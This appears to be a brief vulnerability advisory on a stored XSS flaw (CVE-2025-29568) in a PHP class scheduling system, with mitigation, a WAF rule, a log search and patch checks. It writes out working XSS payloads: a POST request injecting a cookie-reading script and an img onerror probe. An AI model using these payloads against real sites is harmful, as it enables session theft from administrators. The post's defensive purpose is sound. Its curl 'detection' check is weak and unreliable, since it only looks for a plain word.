Listen to this Post
How CVE-2025-29568 Works
The vulnerability exists in the `class_sched.php` component of Code-Projects Online Class and Exam Scheduling System 1.0. The application fails to properly sanitize user-supplied input in the `class` parameter, allowing attackers to inject malicious JavaScript payloads. When an administrator or other privileged user views the compromised class schedule, the script executes in their browser session, potentially leading to session hijacking, data theft, or unauthorized actions. The attack requires no authentication and can be delivered via crafted links or stored in the system.
DailyCVE Form
Platform: Code-Projects Scheduling System
Version: 1.0
Vulnerability: Stored XSS
Severity: Medium
Date: 05/14/2025
What Undercode Say:
Exploitation:
POST /Scheduling/pages/class_sched.php HTTP/1.1 Host: target.com Content-Type: application/x-www-form-urlencoded class=<script>alert(document.cookie)</script>
Detection:
curl -s "http://target.com/Scheduling/pages/class_sched.php?class=TEST" | grep -q "TEST" && echo "Vulnerable"
Mitigation:
// Fix for class_sched.php $class = htmlspecialchars($_POST['class'], ENT_QUOTES, 'UTF-8');
WAF Rule:
location ~ /Scheduling/pages/ {
set $block_xss 0;
if ($args ~ "<script") { set $block_xss 1; }
if ($block_xss = 1) { return 403; }
}
Log Analysis:
grep -E "class=.[<>]" /var/log/apache2/access.log
Patch Verification:
fetch('/Scheduling/pages/class_sched.php?class=<img%20src=x%20onerror=alert(1)>')
.then(response => response.text())
.then(data => console.log(data.includes('<img') ? 'Unpatched' : 'Patched'));
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
